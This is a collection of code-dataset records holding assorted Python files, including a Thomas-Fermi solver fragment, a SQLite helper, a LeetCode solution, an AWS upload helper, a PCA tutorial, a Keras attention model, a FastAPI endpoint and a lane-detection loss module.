-B.T\n\n for i in range(len(lead_info)):\n # sum over leads\n A[N_grid + N_D + i,lead_info[i][0]:lead_info[i][1] + 1] = 1\n # minus the unkown electron number on the leads\n A[N_grid + N_D + i,N_grid + N_D + i] = -1\n \n # barrier lagrange multiplier unknowns\n bar_constraint = 0\n for i in range(len(mask)):\n if mask[i] == 'b':\n A[i,N_grid + N_islands + bar_constraint] = -1\n bar_constraint += 1\n # barrier n = 0\n bar_constraint = 0\n for i in range(len(mask)): \n if mask[i] == 'b':\n A[N_grid + N_islands + bar_constraint,i] = 1 \n bar_constraint += 1\n return A\n\ndef create_b_matrix(x,V,K,mu_l,N_dot,mask,dot_info,lead_info):\n '''\n Convinience function\n Input:\n x : discrete 1D grid\n V : potential\n K : Coulomb interaction matrix between two points\n mask : array specifying the nature of each point 'l1','d','b' or 'l2'\n dot_info : information about number of dots and their start and end points\n lead_info : information about leads and their start and end points\n mu_l : (mu_L1, mu_L2) tuple with the lead potentials\n N_dot: vector with number of electrons in each dot, can be of size 0 i.e no dot\n Output:\n b : vector b used in solution of TF, A z = b \n '''\n N_grid = len(x)\n # 2 are leads\n N_D = len(dot_info)\n N_islands = N_D + 2\n N_bar = len(filter(lambda x: x == 'b',mask))\n \n N_A = N_grid + N_islands + N_bar\n\n # set up the RHS\n b = np.zeros(N_A)\n b[:N_grid] = -V\n\n # lead potentials on the RHS\n # notice the all essential +=\n for i in range(len(lead_info)):\n b[lead_info[i][0]:lead_info[i][1] + 1] += mu_l[i] \n\n b[N_grid:N_grid+N_D] = N_dot\n return b\n\ndef solve_thomas_fermi(x,V,K,mu_l,N_dot):\n '''\n Input:\n x : discrete 1D grid\n V : potential\n K : Coulomb interaction matrix between two points\n mu_l : (mu_L1, mu_L2) tuple with the lead potentials\n N_dot: vector with number of electrons in each dot, can be of size 0 i.e no dot\n Output:\n (n, mu) where\n n : electronic charge density as a function of x\n mu : chemical potential as a function of x\n mu(x) = mu_L when x in leads\n \n Solves the 
Thomas-Fermi equation V - mu + K n = 0 along with the constraint that integral of electron density in a dot is a constant and electron density in the barrier region is zero.\n '''\n #solve the equation A z = b\n # z = (n mu)^T\n N_grid = len(x)\n \n mu_avg = 0.5*(mu_l[0] + mu_l[1])\n mask = dot_classifier.get_mask(x,V,K,mu_avg)\n # dictionary index by dot number, gives [dot_begin_index,dot_end_index]\n dot_info = dot_classifier.get_dot_info(mask)\n lead_info = dot_classifier.get_lead_info(mask)\n \n A = create_A_matrix(x,V,K,mu_l,N_dot,mask,dot_info,lead_info)\n b = create_b_matrix(x,V,K,mu_l,N_dot,mask,dot_info,lead_info)\n z = np.linalg.solve(A,b)\n\n # return the electron density and the dot chemical potentials\n n,mu = z[:N_grid],z[N_grid:N_grid + len(dot_info)]\n # also add the lead chemical potentials to simplify further calculations\n mu = np.concatenate(([mu_l[0]],mu,[mu_l[1]]))\n return n,mu\n \ndef calculate_thomas_fermi_energy(V,K,n,mu,N_dot):\n '''\n Input: \n V : potential profile\n K : Coulomb interaction matrix \n n : electorn density\n mu : chemical potenial profile, includes leads and dot potentials \n Output:\n E : Thomas-Fermi energy\n\n E = V n + 1/2 n K n\n '''\n E = np.sum(V*n) + 0.5 * np.sum(n*np.dot(K,n.T))\n return E\n\n\n \n","sub_path":"junk/simple_models/thomas_fermi.py","file_name":"thomas_fermi.py","file_ext":"py","file_size_in_byte":5267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
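Of the module above, create_K_matrix is the one piece that runs stand-alone (solve_thomas_fermi additionally needs the dot_classifier helper, which is not shown here); a small shape/symmetry check, assuming the file is importable as thomas_fermi per its sub_path:

import numpy as np
from thomas_fermi import create_K_matrix  # assumed import path

x = np.linspace(0.0, 1.0, 5)
K = create_K_matrix(x, E_scale=1.0, sigma=0.1, x_0=1.0)
assert K.shape == (5, 5)
assert np.allclose(K, K.T)                 # symmetric under x1 <-> x2
assert np.allclose(np.diag(K), 1.0 / 0.1)  # r = 0 on the diagonal -> E_scale/sigma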
+{"seq_id":"605211768","text":"import sqlite3\nfrom util import to_text\n\n__EXT_SQL__ = \"\"\"\nSELECT * FROM sqlite_master WHERE name =? and type='table'; \n\"\"\"\n\n__GET_SQL__ = \"\"\"\nSELECT value FROM TABLENAME WHERE id=? LIMIT 1;\n\"\"\"\n__SET_SQL__ = \"\"\"\nINSERT OR REPLACE INTO TABLENAME (id, value) VALUES (?,?);\n\"\"\"\n__DEL_SQL__ = \"\"\"\nDELETE FROM TABLENAME WHERE id=?;\n\"\"\"\n\nclass BunHelper():\n def __init__(self, date_string, filename='.\\data\\hwk\\hwk.sqlite3'):\n \"\"\"\n 传入的日期用以建立表格。此处需要注意,默认格式为\n 20180409\n \"\"\"\n\n self.db = sqlite3.connect(filename, check_same_thread=False)\n self.db.text_factory = str\n self.tbname=\"HWD\"+date_string\n self.get_sql_str = __GET_SQL__.replace('TABLENAME',self.tbname)\n self.set_sql_str = __SET_SQL__.replace('TABLENAME',self.tbname)\n self.del_sql_str =__DEL_SQL__.replace('TABLENAME',self.tbname)\n \n session_json = self.db.execute(\n __EXT_SQL__, (self.tbname, )\n ).fetchone()\n if session_json is None:\n self.ext = 0\n else:\n self.ext = 1\n \n def is_ext(self):\n return self.ext\n \n def get(self, id):\n \"\"\"\n 根据 id 获取数据。\n :param id: 要获取的数据的 id\n :return: 返回取到的数据,如果是空则返回一个空的 ``dict`` 对象\n \"\"\"\n session_json = self.db.execute(\n self.get_sql_str, (id, )\n ).fetchone()\n if session_json is None:\n return \"\"\n return to_text(session_json[0])\n\n def set(self, id, value):\n \"\"\"\n 根据 id 写入数据。\n :param id: 要写入的 id\n :param value: 要写入的数据,可以是一个 ``dict`` 对象\n \"\"\"\n self.db.execute(\n self.set_sql_str,\n (id, value)\n )\n self.db.commit()\n\n def delete(self, id):\n \"\"\"\n 根据 id 删除数据。\n :param id: 要删除的数据的 id\n \"\"\"\n self.db.execute(self.del_sql_str, (id, ))\n self.db.commit()\n \n def checkunsubmit(self, ids):\n unsubmitlist=[]\n for id in ids:\n if(len(self.get(id))==0):\n unsubmitlist.append(id)\n return unsubmitlist\n \n","sub_path":"scbun_helper.py","file_name":"scbun_helper.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"46709700","text":"import re\r\nstr=input()\r\ndateRegex = re.compile(r'(\\d{2})/(\\d{2})/(\\d{4})')\r\nmo =dateRegex.search(str)\r\nif mo==None:\r\n print(\"Invalid format\")\r\nelse:\r\n date = int(mo.group(1))\r\n month = int(mo.group(2))\r\n year = int(mo.group(3))\r\n\r\n if year%4==0:\r\n if year%100==0:\r\n if year%400==0:\r\n feb=29\r\n else:\r\n feb=28\r\n else:\r\n feb=29\r\n else:\r\n feb=28\r\n dmax=[31,feb,31,30,31,30,31,31,30,31,30,31]\r\n if date>dmax[month-1]:\r\n print(\"Invalid date\")\r\n elif month>12:\r\n print(\"Invalid date\")\r\n elif year>=3000 or year<1000:\r\n print(\"Invalid date\")\r\n else:\r\n print(\"Valid date\")\r\n \r\n","sub_path":"Chapter-7/Date_Detection.py","file_name":"Date_Detection.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"178337349","text":"# FB tag frequency top 100\n# https://leetcode.com/problems/remove-invalid-parentheses/\n# remove the minimum number of invalid parentheses, \n# return all the possible results in any order\n\nclass Solution:\n def removeInvalidParentheses(self, s: str) -> List[str]:\n def isValid(st: str) -> bool:\n unpaired = 0\n for char in st:\n if char == \"(\":\n unpaired += 1\n if char == \")\":\n if unpaired < 1:\n return False\n else:\n unpaired -= 1\n return True if unpaired == 0 else False\n \n # record indices of left/right parentheses\n left_i = []\n right_i = []\n for i, char in enumerate(s):\n if char == \"(\": left_i.append(i)\n if char == \")\": right_i.append(i)\n \n # record the number of left/right parentheses to remove\n left_unpaired = 0\n right_unpaired = 0\n for char in s:\n if char == \"(\":\n left_unpaired += 1\n if char == \")\":\n if left_unpaired < 1:\n right_unpaired += 1\n else:\n left_unpaired -= 1\n \n # since known number of left/right parentheses to remove, try permutations\n left_comb = list(itertools.combinations(left_i, left_unpaired))\n right_comb = list(itertools.combinations(right_i, right_unpaired))\n product = list(itertools.product(left_comb, right_comb))\n\n result = []\n for prd in product:\n arr = list(s)\n indices_rm = []\n for i in prd[0]:\n indices_rm.append(i)\n for j in prd[1]:\n indices_rm.append(j)\n \n # For multiple pop/delete with known indices, first do reverse sorting!\n indices_rm = sorted(indices_rm, reverse=True)\n for index in indices_rm:\n arr.pop(index)\n \n output = \"\".join(arr)\n if isValid(output):\n result.append(output)\n \n return set(result)","sub_path":"leetcode/301_RemoveInvalidParentheses.py","file_name":"301_RemoveInvalidParentheses.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"539727640","text":"import boto3\nimport datetime\nimport json\nimport threading\nimport cv2\nimport os\n\nTOPIC_ARN = 'arn:aws:sns:eu-central-1:972411866948:predator_sns'\nBUCKET = 'predator-rpi-bucket'\nIMAGE_UPLOAD_TIME_SEC = 5\nSNS_NOTIFICATION_TIME_SEC = 300\nBASE_PATH = '/tmp/'\n\n\ndef send_notification(subject, message):\n client = boto3.client('sns')\n client.publish(\n TopicArn=TOPIC_ARN,\n Message=message,\n Subject=subject\n )\n\n\ndef upload_image_s3(image_path, file_key):\n s3 = boto3.resource('s3')\n bucket = s3.Bucket(BUCKET)\n bucket.upload_file(image_path, file_key)\n\n\ndef save_and_upload_image(image, x):\n path = \"predator_capture_{}.jpg\".format(str(datetime.datetime.now()))\n os_path = \"{}{}\".format(BASE_PATH, path)\n cv2.imwrite(os_path, image)\n upload_image_s3(os_path, path)\n delete_image(os_path)\n\n\ndef delete_image(path):\n os.remove(path)\n\n\nclass AWSPredator:\n def __init__(self):\n self.last_s3_image_time = None\n self.last_sns_time = None\n\n def detected_movement(self, image):\n now = datetime.datetime.now()\n if self.last_s3_image_time is None or (now-self.last_s3_image_time).total_seconds() > IMAGE_UPLOAD_TIME_SEC:\n self.last_s3_image_time = now\n t = threading.Thread(target=save_and_upload_image, args=(image, None))\n t.start()\n\n if self.last_sns_time is None or (now-self.last_sns_time).total_seconds() > SNS_NOTIFICATION_TIME_SEC:\n self.last_sns_time = now\n t = threading.Thread(target=send_notification, args=(\"Predator detected movement!\", json.dumps({\n \"Message\": \"Predator detected movement\",\n \"Time\": str(now),\n })))\n t.start()\n","sub_path":"utils/aws_utils.py","file_name":"aws_utils.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"544735610","text":"## Make sure to install and import necessary modules first\n\nimport pandas as pd\nimport numpy as np\nimport random as rd\nfrom sklearn.decomposition import PCA\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\n\n# Loading the data\n# Note: This is already a preprocessed data.\n\ndata = pd.read_csv('./pca_example_dataset.csv')\n\n## In this example, the data is in a data frame called data.\n## Columns represent different samples (i.e. cells) that may have been under specific conditions to alter gene expression.\n## Rows represent genes from these different samples.\n\n# Checking the head (First 5 columns) and shape of the data.\nprint(data.head())\nprint(data.shape)\n\n# Drop geneid before applying PCA as it has no significance in statistics.\nd = data.drop(\"geneid\", 1)\nd.head() # checking if geneid is removed or not.\nd.shape\n\n# First center and scale the data\nscaled_data = preprocessing.scale(d.T)\n\npca = PCA() # create a PCA object\npca.fit(scaled_data) # do the statistics\npca_data = pca.transform(scaled_data) # get PCA coordinates for scaled_data\n\n# Drawing a scree plot and a PCA plot:\n\n# The following code constructs the Scree plot\nper_var = np.round(pca.explained_variance_ratio_ * 100, decimals=1)\nlabels = ['PC' + str(x) for x in range(1, len(per_var) + 1)]\n\nplt.bar(x=range(1, len(per_var) + 1), height=per_var, tick_label=labels)\nplt.ylabel('Percentage of Explained Variance')\nplt.xlabel('Principal Component')\nplt.title('Scree Plot')\nplt.show()\n\n# the following code creates PC1 and PC2 in a 2D PCA plot:\npca_df = pd.DataFrame(pca_data, columns=labels)\n\nplt.scatter(pca_df.PC1, pca_df.PC2)\nplt.title('My PCA Graph')\nplt.xlabel('PC1 - {0}%'.format(per_var[0]))\nplt.ylabel('PC2 - {0}%'.format(per_var[1]))\n\nfor sample in pca_df.index:\n plt.annotate(sample, (pca_df.PC1.loc[sample], pca_df.PC2.loc[sample]))\n\nplt.show()\n\n# Determine which genes had the biggest influence on PC1:\n\n## get the name of the top 10 measurements (genes) that contribute\n## most to pc1.\n## first, get the loading scores\nloading_scores = pd.Series(pca.components_[0])\n\n## now sort the loading scores based on their magnitude\nsorted_loading_scores = loading_scores.abs().sort_values(ascending=False)\n\n# get the names of the top 10 genes\ntop_10_genes = sorted_loading_scores[0:10].index.values\nprint(top_10_genes)\n\n","sub_path":"PCA_analysis.py","file_name":"PCA_analysis.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"145758956","text":"from keras.layers import Bidirectional, Concatenate, Permute, Dot, Input, LSTM, Multiply\nfrom keras.layers import RepeatVector, Dense, Activation, Lambda ,Flatten\nfrom keras.optimizers import Adam\nfrom keras.utils import to_categorical\nfrom keras.models import load_model, Model\nimport keras.backend as K\nimport numpy as np\nfrom keras.models import Sequential\nimport random\nfrom nmt_utils import *\nimport matplotlib.pyplot as plt\nfrom keras.models import model_from_json\nfrom br_util import *\nfrom numpy import argmax\nfrom loader_v2 import *\n#get_ipython().magic('matplotlib inline')\nnp.random.seed(12345)\nno_pers=3 #no of persons to collect\n\nX_train,Y_train,X_test,Y_test,f,s=lo_data2()\nin_v_dic,v_in_dic=load_dict()\n\n\"\"\"\nX : input frames as 3 dimension\nY : 1D list of output labels\nf : number of features per frame (mostly 426 features)\ng : number of input gestures (length of the training dataset)\ns : maximum number of sequences per gesture (also it will be no. inputs for RNN)\nin_v_dic : index to vocab dictionary\nv_in_dic : vocab to index dictionary\n\"\"\"\nprint (Y_train[0])\n\nprint(\"index to vocab\")\nprint(in_v_dic)\n\nprint(\"vocab to index\")\nprint(v_in_dic)\nm=X_train.shape[0]\nTx=s\nTy=1\nYoh_train=preprocess_data(Y_train,v_in_dic,Ty)\nYoh_test=preprocess_data(Y_test,v_in_dic,Ty)\n\nprint(Yoh_train.shape)\n'''\nprint(Y[1])\nprint(Yoh[1])\nprint(Y[200])\nprint(Yoh[200])\nprint(Y[500])\nprint(Yoh[500])\nprint(Y[1500])\nprint(Yoh[1500])\n\nprint(argmax(Yoh[1])) # from one hot vector to integer\n'''\n\nprint(\"X.shape:\", X_train.shape)\nprint(\"Y.shape:\", Y_train.shape)\nprint(\"Yoh.shape:\", Yoh_train.shape)\n\n\n'''\nindex = 0\nprint(\"Source date:\", dataset[index][0])\nprint(\"Target date:\", dataset[index][1])\nprint()\nprint(\"Source after preprocessing (indices):\", X[index])\nprint(\"Target after preprocessing (indices):\", Y[index])\nprint()\nprint(\"Source after preprocessing (one-hot):\", Xoh[index])\nprint(\"Target after preprocessing (one-hot):\", Yoh[index])\n'''\n\n\n# Defined shared layers as global variables\nrepeator = RepeatVector(Tx)\nconcatenator = Concatenate(axis=-1)\ndensor = Dense(1, activation = \"relu\")\nactivator = Activation(softmax, name='attention_weights') # We are using a custom softmax(axis = 1) loaded in this notebook\ndotor = Dot(axes = 1)\n\n\n\ndef one_step_attention(a, s_prev):\n \"\"\"\n Performs one step of attention: Outputs a context vector computed as a dot product of the attention weights\n \"alphas\" and the hidden states \"a\" of the Bi-LSTM.\n\n Arguments:\n a -- hidden state output of the Bi-LSTM, numpy-array of shape (m, Tx, 2*n_a)\n s_prev -- previous hidden state of the (post-attention) LSTM, numpy-array of shape (m, n_s)\n\n Returns:\n context -- context vector, input of the next (post-attetion) LSTM cell\n \"\"\"\n\n ### START CODE HERE ###\n # Use repeator to repeat s_prev to be of shape (m, Tx, n_s) so that you can concatenate it with all hidden states \"a\" ( 1 line)\n s_prev = repeator(s_prev)\n # Use concatenator to concatenate a and s_prev on the last axis ( 1 line)\n concat = concatenator([s_prev,a])\n # Use densor to propagate concat through a small fully-connected neural network to compute the \"energies\" variable e. 
(1 lines)\n\n e = densor(concat)\n # Use activator and e to compute the attention weights \"alphas\" ( 1 line)\n alphas = activator(e)\n # Use dotor together with \"alphas\" and \"a\" to compute the context vector to be given to the next (post-attention) LSTM-cell ( 1 line)\n context = dotor([alphas,a])\n ### END CODE HERE ###\n\n return context\n\n\n# You will be able to check the expected output of `one_step_attention()` after you've coded the `model()` function.\n\n# **Exercise**: Implement `model()` as explained in figure 2 and the text above. Again, we have defined global layers that will share weights to be used in `model()`.\n\n# In[8]:\n\nn_a = 64\nn_s = 128\npost_activation_LSTM_cell = LSTM(n_s, return_state = True)\noutput_layer = Dense(len(v_in_dic), activation=softmax)\n\n\n# Now you can use these layers $T_y$ times in a `for` loop to generate the outputs, and their parameters will not be reinitialized. You will have to carry out the following steps:\n#\n# 1. Propagate the input into a [Bidirectional](https://keras.io/layers/wrappers/#bidirectional) [LSTM](https://keras.io/layers/recurrent/#lstm)\n# 2. Iterate for $t = 0, \\dots, T_y-1$:\n# 1. Call `one_step_attention()` on $[\\alpha^{},\\alpha^{}, ..., \\alpha^{}]$ and $s^{}$ to get the context vector $context^{}$.\n# 2. Give $context^{}$ to the post-attention LSTM cell. Remember pass in the previous hidden-state $s^{\\langle t-1\\rangle}$ and cell-states $c^{\\langle t-1\\rangle}$ of this LSTM using `initial_state= [previous hidden state, previous cell state]`. Get back the new hidden state $s^{}$ and the new cell state $c^{}$.\n# 3. Apply a softmax layer to $s^{}$, get the output.\n# 4. Save the output by adding it to the list of outputs.\n#\n# 3. Create your Keras model instance, it should have three inputs (\"inputs\", $s^{<0>}$ and $c^{<0>}$) and output the list of \"outputs\".\n\n# In[9]:\n\n# GRADED FUNCTION: model\n\ndef model(Tx, Ty, n_a, n_s, human_vocab_size, machine_vocab_size):\n \"\"\"\n Arguments:\n Tx -- length of the input sequence\n Ty -- length of the output sequence\n n_a -- hidden state size of the Bi-LSTM\n n_s -- hidden state size of the post-attention LSTM\n human_vocab_size -- size of the python dictionary \"human_vocab\"\n machine_vocab_size -- size of the python dictionary \"machine_vocab\"\n\n Returns:\n model -- Keras model instance\n \"\"\"\n\n # Define the inputs of your model with a shape (Tx,)\n # Define s0 and c0, initial hidden state for the decoder LSTM of shape (n_s,)\n X = Input(shape=(Tx, human_vocab_size))\n s0 = Input(shape=(n_s,), name='s0')\n c0 = Input(shape=(n_s,), name='c0')\n s = s0\n c = c0\n\n # Initialize empty list of outputs\n outputs = []\n\n ### START CODE HERE ###\n\n # Step 1: Define your pre-attention Bi-LSTM. Remember to use return_sequences=True. 
( 1 line)\n #a = Bidirectional(LSTM(n_a,return_sequences=True)([X,s0]))\n\n a = Bidirectional(LSTM(n_a, return_sequences=True))(X)\n\n # Step 2: Iterate for Ty steps\n for t in range(Ty):\n\n # Step 2.A: Perform one step of the attention mechanism to get back the context vector at step t ( 1 line)\n context = one_step_attention(a, s)\n\n # Step 2.B: Apply the post-attention LSTM cell to the \"context\" vector.\n # Don't forget to pass: initial_state = [hidden state, cell state] ( 1 line)\n s, _, c = post_activation_LSTM_cell(initial_state = [s, c] , inputs=context)\n\n # Step 2.C: Apply Dense layer to the hidden state output of the post-attention LSTM ( 1 line)\n\n out = output_layer(s)\n\n # Step 2.D: Append \"out\" to the \"outputs\" list (1 line)\n outputs.append(out)\n\n # Step 3: Create model instance taking three inputs and returning the list of outputs. (1 line)\n\n model = Model(inputs=[X,s0,c0],outputs=outputs)\n\n ### END CODE HERE ###\n\n return model\n\n\n# Run the following cell to create your model.\n\n# In[10]:\n\nmodel = model(Tx, Ty, n_a, n_s, f, len(v_in_dic))\n\n\n# Let's get a summary of the model to check if it matches the expected output.\n\n# In[11]:\n\nmodel.summary()\n\n\n### START CODE HERE ### (2 lines)\nopt = Adam(lr=0.005, beta_1=0.9, beta_2=0.999, decay=0.01)\nmodel.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n### END CODE HERE ###\n\n\n# The last step is to define all your inputs and outputs to fit the model:\n# - You already have X of shape $(m = 10000, T_x = 30)$ containing the training examples.\n# - You need to create `s0` and `c0` to initialize your `post_activation_LSTM_cell` with 0s.\n# - Given the `model()` you coded, you need the \"outputs\" to be a list of 11 elements of shape (m, T_y). So that: `outputs[i][0], ..., outputs[i][Ty]` represent the true labels (characters) corresponding to the $i^{th}$ training example (`X[i]`). More generally, `outputs[i][j]` is the true label of the $j^{th}$ character in the $i^{th}$ training example.\n\n# In[ ]:\n\ns0 = np.zeros((m, n_s))\nc0 = np.zeros((m, n_s))\n#outputs = list(Yoh.swapaxes(0,1))\n#print(outputs.shape)\n\n\n# Let's now fit the model and run it for one epoch.\n\n# In[ ]:\nprint(X_train.shape)\nmodel.fit([X_train, s0, c0], Yoh_train, epochs=150, batch_size=50)\n#model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n\n#from keras.models import load_model\nmodel.save('models\\\\model_2.h5')\nmodel.save_weights('models\\\\model_w_2.h5')\n\n'''\nmodel = load_model('my_model.h5')\nmodel.load_weights('my_model_weights.h5')\nmodel.load_weights('my_model_weights.h5', by_name=True)\n'''\n\n\n\n'''\nEXAMPLES = ['3 May 1979', '5 April 09', '21th of August 2016', 'Tue 10 Jul 2007', 'Saturday May 9 2018', 'March 3 2001', 'March 3rd 2001', '1 March 2001']\nfor example in EXAMPLES:\n\n source = string_to_int(example, Tx, human_vocab)\n source = np.array(list(map(lambda x: to_categorical(x, num_classes=len(human_vocab)), source))).swapaxes(0,1)\n prediction = model.predict([source, s0, c0])\n prediction = np.argmax(prediction, axis = -1)\n output = [inv_machine_vocab[int(i)] for i in prediction]\n\n print(\"source:\", example)\n print(\"output:\", ''.join(output))\n\n\n# You can also change these examples to test with your own examples. 
The next part will give you a better sense on what the attention mechanism is doing--i.e., what part of the input the network is paying attention to when generating a particular output character.\n'''\n\n\nmodel.summary()\nb=X_test.shape[0]\nst0 = np.zeros((b, n_s))\nct0 = np.zeros((b, n_s))\nprint(model.evaluate([X_test,st0,ct0], Yoh_test, verbose=0))\n\n\n\"\"\"\n#z=X[1000].reshape(1,s,f)\nz=X[1000:1060,:,:]\nprediction = model.predict([z,s0,c0])\n\n#print(prediction)\n\nprint(Y[1000:1060])\n#print(X[1])\nprediction = np.argmax(prediction, axis = -1)\nou = [in_v_dic[int(i)] for i in prediction]\nprint(ou)\n\nz=X[400:450,:,:]\nprediction = model.predict([z,s0,c0])\n\nprint(Y[400:450])\n#print(X[1])\nprediction = np.argmax(prediction, axis = -1)\nou = [in_v_dic[int(i)] for i in prediction]\nprint(ou)\n\n\nz=X[1890:1905,:,:]\nprediction = model.predict([z,s0,c0])\n\nprint(Y[1890:1905])\n#print(X[1])\nprediction = np.argmax(prediction, axis = -1)\nou = [in_v_dic[int(i)] for i in prediction]\nprint(ou)\n\"\"\"\n","sub_path":"rnn/RNN.py","file_name":"RNN.py","file_ext":"py","file_size_in_byte":10470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"43306789","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\t\n# Copyright (C) 2004-2009 Tiny SPRL (). All Rights Reserved\n# $Id$\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport gtk\nfrom gtk import glade\nimport gobject\nimport gettext\nimport pprint\n\n#from view_tree import parse\nimport rpc\n\n\nfields_list_type = {\n 'checkbox': gobject.TYPE_BOOLEAN,\n 'integer': gobject.TYPE_INT,\n 'float': gobject.TYPE_FLOAT\n}\n\nclass win_list(object):\n def __init__(self, model, sel_multi=True, context={}, search=False):\n self.sel_multi = sel_multi\n self.context = context\n self.context.update(rpc.session.context)\n\n self.model_name = model\n view = rpc.session.rpc_exec_auth('/object', 'execute', model, 'fields_view_get', False, 'tree', context)\n self.view_data = view\n\n self.tree = widget.tree(view['arch'], view['fields'], model, sel_multi=sel_multi, search=search)\n self.tree.context = context\n self.fields = view['fields']\n self.widget = self.tree.widget\n self.view = self.tree.widget\n self.fields_order = self.tree.fields_order\n\n def destroy(self):\n self.tree.destroy()\n del self.fields_order\n del self.widget\n del self.view\n\n def reload(self, ids):\n res = rpc.session.rpc_exec_auth('/object', 'execute', self.model_name, 'read', ids, self.fields_order, self.context)\n self.tree.value = res\n\n def sel_pos_set(self, num):\n sel = self.view.get_selection()\n sel.unselect_all()\n sel.select_path((num,))\n self.view.scroll_to_cell((num,))\n\n def sel_ids_get(self):\n return self.tree.sel_ids_get()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n\n","sub_path":"bin/modules/gui/window/win_list.py","file_name":"win_list.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"271874122","text":"from typing import List\n\nfrom fastapi import Depends, FastAPI, HTTPException\nfrom sqlalchemy.orm import Session\n\nfrom auth import models, schemas, handlers\nfrom auth.database import SessionLocal, engine\n\nmodels.Base.metadata.create_all(bind=engine)\n\napp = FastAPI()\n\n\n# Dependency\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n\n@app.post(\"/users/\", response_model=schemas.UserShow)\ndef create_user(user: schemas.UserCreate, db: Session = Depends(get_db)):\n db_instance = handlers.user_info_by_username(db, username= user.username)\n if db_instance:\n raise HTTPException(status_code=400, detail=\"User already registered\")\n return handlers.create_user(db, user)\n\n\n@app.get(\"/users/\")\ndef get_users(start: int = 0, end: int = 100, db: Session = Depends(get_db)):\n return handlers.user_info_all(db, skip=start, limit=end)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"237828686","text":"###\n# Time Complexity: O(n)\n# Space Complexity: O(n)\n##\nclass Solution(object):\n def findMaxLength(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n d = {0 : -1}\n accu = 0\n max_len = 0\n for i, num in enumerate(nums):\n accu += num if num == 1 else -1\n if accu in d:\n max_len = max(max_len, i - d[accu])\n else:\n d[accu] = i\n return max_len\n ","sub_path":"MyLeetCode/FB/Contiguous Array.py","file_name":"Contiguous Array.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"271865107","text":"import torch.nn as nn\nimport torch\nimport torch.nn.functional as F\n\nfrom lanedet.runner.registry import TRAINER\nfrom .losses.dice_loss import dice_loss\nfrom .losses.focal_loss import SoftmaxFocalLoss\n\n@TRAINER.register_module\nclass RESA(nn.Module):\n def __init__(self, cfg):\n super(RESA, self).__init__()\n self.cfg = cfg\n weights = torch.ones(cfg.num_classes)\n weights[0] = cfg.bg_weight\n weights = weights.cuda()\n self.criterion = torch.nn.NLLLoss(ignore_index=self.cfg.ignore_label,\n weight=weights).cuda()\n self.criterion_exist = torch.nn.BCEWithLogitsLoss().cuda()\n self.focal_loss = SoftmaxFocalLoss(2.)\n\n def forward(self, net, batch):\n output = net(batch['img'])\n\n loss_stats = {}\n loss = 0.\n\n seg_loss = self.criterion(F.log_softmax(\n output['seg'], dim=1), batch['label'].long())\n # target = F.one_hot(batch['label'], num_classes=self.cfg.num_classes).permute(0, 3, 1, 2)\n # seg_loss = dice_loss(F.softmax(\n # output['seg'], dim=1)[:, 1:], target[:, 1:]) * self.cfg.seg_loss_weight\n loss += seg_loss\n loss_stats.update({'seg_loss': seg_loss})\n\n if 'exist' in output:\n exist_loss = 0.1 * \\\n self.criterion_exist(output['exist'], batch['exist'].float())\n loss += exist_loss\n loss_stats.update({'exist_loss': exist_loss})\n\n ret = {'loss': loss, 'loss_stats': loss_stats}\n\n return ret\n","sub_path":"lanedet/runner/trainer/resa.py","file_name":"resa.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
